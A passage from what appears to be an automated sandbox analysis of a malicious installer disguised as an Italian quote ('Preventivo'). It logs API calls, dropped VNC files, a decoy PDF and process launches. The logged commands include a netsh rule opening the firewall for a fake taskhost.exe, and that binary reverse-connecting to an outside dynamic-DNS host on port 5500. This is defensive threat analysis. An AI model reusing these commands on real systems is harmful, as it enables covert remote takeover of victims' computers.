rofileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,41_2_000C7AE0
Source: C:\Games\taskhost.exeCode function: 41_2_000D37A0 GetPrivateProfileIntA,EnumDisplaySettingsA,LoadLibraryA,GetProcAddress,FreeLibrary,FreeLibrary,GetFileVersionInfoSizeA,GetFileVersionInfoA,VerQueryValueA,VerQueryValueA,VerQueryValueA,CreateDCA,DeleteDC,41_2_000D37A0
Source: C:\Games\viewer.exeCode function: 6_2_00633D28 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_00633D28
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
Source: C:\Games\viewer.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Games\viewer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Games\viewer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Games\taskhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Games\taskhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Games\taskhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Games\taskhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Games\viewer.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Games\viewer.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Games\taskhost.exeCode function: 41_2_000C57B0 GetPrivateProfileStringA,WTSGetActiveConsoleSessionId,KiUserCallbackDispatcher,GetCurrentProcessId,ProcessIdToSessionId,CreateToolhelp32Snapshot,Process32First,CloseHandle,Process32Next,ProcessIdToSessionId,Process32Next,CloseHandle,CloseHandle,41_2_000C57B0
Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 402
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\vnchooks.dllJump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI6FFC.tmpJump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shi6E82.tmpJump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\ddengine.dllJump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\UVncVirtualDisplay\UVncVirtualDisplay.dllJump to dropped file
Source: C:\Games\taskhost.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Games\viewer.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Games\taskhost.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-60273
Source: C:\Games\viewer.exeAPI coverage: 5.2 %
Source: C:\Windows\SysWOW64\timeout.exe TID: 8544Thread sleep count: 169 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 8964Thread sleep count: 169 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 9112Thread sleep count: 171 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 8212Thread sleep count: 168 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 8260Thread sleep count: 166 > 30
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile Volume queried: C:\Users\user\AppData\Roaming FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00FE9080 FindFirstFileW,FindClose,CloseHandle,CloseHandle,0_2_00FE9080
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00EA5220 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,PathIsUNCW,0_2_00EA5220
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00FBD700 FindFirstFileW,GetLastError,FindClose,0_2_00FBD700
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_01008B30 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,0_2_01008B30
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00FBCDD0 FindFirstFileW,FindFirstFileW,FindClose,FindClose,0_2_00FBCDD0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00FE3210 FindFirstFileW,FindClose,0_2_00FE3210
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00F9F570 FindFirstFileW,FindNextFileW,FindClose,0_2_00F9F570
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00FF3790 FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,0_2_00FF3790
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00FF3C10 FindFirstFileW,FindClose,0_2_00FF3C10
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00FCBFF0 FindFirstFileW,FindClose,FindClose,0_2_00FCBFF0
Source: C:\Games\taskhost.exeCode function: 41_2_000BEC90 GetDlgItem,GetModuleFileNameA,_strrchr,FindFirstFileA,SendMessageA,SendMessageA,FindNextFileA,FindClose,41_2_000BEC90
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00FF2400 GetLogicalDriveStringsW,GetDriveTypeW,Wow64DisableWow64FsRedirection,Wow64RevertWow64FsRedirection,0_2_00FF2400
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_01087833 VirtualQuery,GetSystemInfo,0_2_01087833
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\c.cmdJump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\cmmc.cmdJump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\cmd.txtJump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\ddengine.dllJump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\Jump to behavior
Source: viewer.exe, 0000002A.00000002.1871973925.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}+
Source: Preventivo24.01.11.exe, 00000000.00000003.1697655494.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000002.1700664363.00000000009A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWCZ
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.drBinary or memory string: , (Hyper-V Tools)
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.drBinary or memory string: , (Hyper-V Server)
Source: Preventivo24.01.11.exe, Preventivo24.01.11.exe, 00000000.00000002.1700517838.0000000000977000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1697655494.00000000009B8000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1699048395.0000000000977000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000002.1700664363.00000000009B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.drBinary or memory string: Service Pack: 6aService Pack: 1aService Pack:%d.%dService Pack:%dService Pack:0.%d, (Storage Server Enterprise), (Storage Server Express), (Storage Server Standard), (Storage Server Workgroup), (Storage Server Essentials), (Storage Server), (Home Server Premium Edition), (Home Server Edition), (Terminal Services), (Embedded), (Terminal Services in Remote Admin Mode), (64 Bit Edition), (Media Center Edition), (Tablet PC Edition), (Compute Cluster Edition), (Foundation Edition), (MultiPoint Premium Edition), (MultiPoint Edition), (Security Appliance), (BackOffice), (N Edition), (E Edition), (Hyper-V Tools), (Hyper-V Server), (Server Core), (Uniprocessor Free), (Uniprocessor Checked), (Multiprocessor Free), (Multiprocessor Checked), (Windows Essential Business Server Manangement Server), (Windows Essential Business Server Messaging Server), (Windows Essential Business Server Security Server), (Cluster Server), (Small Business Server), (Small Business Server Premium), (Prerelease), (Evaluation), (Automotive), (China), (Single Language), (Win32s), (Education), (Industry), (Student), (Mobile), (IoT Core), (Cloud Host Infrastructure Server), (S Edition), (Cloud Storage Server), (PPI Pro), (Connected Car), (Handheld)Failed in call to GetOSVersion
Source: taskhost.exe, 00000029.00000002.3496512970.000000000114E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_0108F843 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0108F843
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00FF6910 CreateFileW,GetLastError,OutputDebugStringW,OutputDebugStringW,SetFilePointer,OutputDebugStringW,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,0_2_00FF6910
Source: C:\Games\taskhost.exeCode function: 41_2_000C57B0 GetPrivateProfileStringA,WTSGetActiveConsoleSessionId,KiUserCallbackDispatcher,GetCurrentProcessId,ProcessIdToSessionId,CreateToolhelp32Snapshot,Process32First,CloseHandle,Process32Next,ProcessIdToSessionId,Process32Next,CloseHandle,CloseHandle,41_2_000C57B0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00FC0CA0 LoadLibraryW,GetProcAddress,FreeLibrary,0_2_00FC0CA0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_0108A1CE mov esi, dword ptr fs:[00000030h]0_2_0108A1CE
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_010A4796 mov eax, dword ptr fs:[00000030h]0_2_010A4796
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_010A47DA mov eax, dword ptr fs:[00000030h]0_2_010A47DA
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_01095EA4 mov ecx, dword ptr fs:[00000030h]0_2_01095EA4
Source: C:\Games\viewer.exeCode function: 6_2_0064B9CA mov eax, dword ptr fs:[00000030h]6_2_0064B9CA
Source: C:\Games\viewer.exeCode function: 6_2_00643C84 mov eax, dword ptr fs:[00000030h]6_2_00643C84
Source: C:\Games\taskhost.exeCode function: 41_2_001DC838 mov eax, dword ptr fs:[00000030h]41_2_001DC838
Source: C:\Games\taskhost.exeCode function: 41_2_001CD615 mov ecx, dword ptr fs:[00000030h]41_2_001CD615
Source: C:\Games\taskhost.exeCode function: 41_2_001DC7F4 mov eax, dword ptr fs:[00000030h]41_2_001DC7F4
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_0108A23A GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,0_2_0108A23A
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00EC2520 __set_se_translator,SetUnhandledExceptionFilter,0_2_00EC2520
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_0108ACAE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0108ACAE
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00EC5180 __set_se_translator,SetUnhandledExceptionFilter,0_2_00EC5180
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_0108F843 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0108F843
Source: C:\Games\viewer.exeCode function: 6_2_00635248 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00635248
Source: C:\Games\viewer.exeCode function: 6_2_00639256 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00639256
Source: C:\Games\viewer.exeCode function: 6_2_006353DE SetUnhandledExceptionFilter,6_2_006353DE
Source: C:\Games\viewer.exeCode function: 6_2_006347F5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_006347F5
Source: C:\Games\taskhost.exeCode function: 41_2_001BC87C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,41_2_001BC87C
Source: C:\Games\taskhost.exeCode function: 41_2_001B8A67 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,41_2_001B8A67
Source: C:\Games\viewer.exeCode function: 6_2_00615210 GetWindowsDirectoryW,GetForegroundWindow,ShellExecuteExW,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,CloseHandle,GetModuleHandleW,GetProcAddress,CloseHandle,Sleep,Sleep,EnumWindows,BringWindowToTop,6_2_00615210
Source: C:\Games\viewer.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>NulJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V DescriptionJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\~.pdfJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\c.cmdJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V DescriptionJump to behavior
Source: C:\Games\viewer.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\c.cmd" "Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\cmd.txt"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\once.cmd
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\cmmc.cmd
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Games\taskhost.exe C:\Games\taskhost.exe -autoreconnect ID:5383948 -connect vnvariant2024.ddnsfree.com:5500 -run
Source: C:\Games\viewer.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\once.cmd" "
Source: C:\Games\viewer.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /fJump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeProcess created: C:\Windows\SysWOW64\msiexec.exe c:\windows\system32\msiexec.exe" /i "c:\users\user\appdata\roaming\photo and fax vn\photo and vn 1.1.2\install\f97891c\main1.msi" ai_setupexepath=c:\users\user\desktop\preventivo24.01.11.exe setupexedir=c:\users\user\desktop\ exe_cmd_line="/exenoupdates /forcecleanup /wintime 1706008514 " ai_euimsi="
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeProcess created: C:\Windows\SysWOW64\msiexec.exe c:\windows\system32\msiexec.exe" /i "c:\users\user\appdata\roaming\photo and fax vn\photo and vn 1.1.2\install\f97891c\main1.msi" ai_setupexepath=c:\users\user\desktop\preventivo24.01.11.exe setupexedir=c:\users\user\desktop\ exe_cmd_line="/exenoupdates /forcecleanup /wintime 1706008514 " ai_euimsi="Jump to behavior
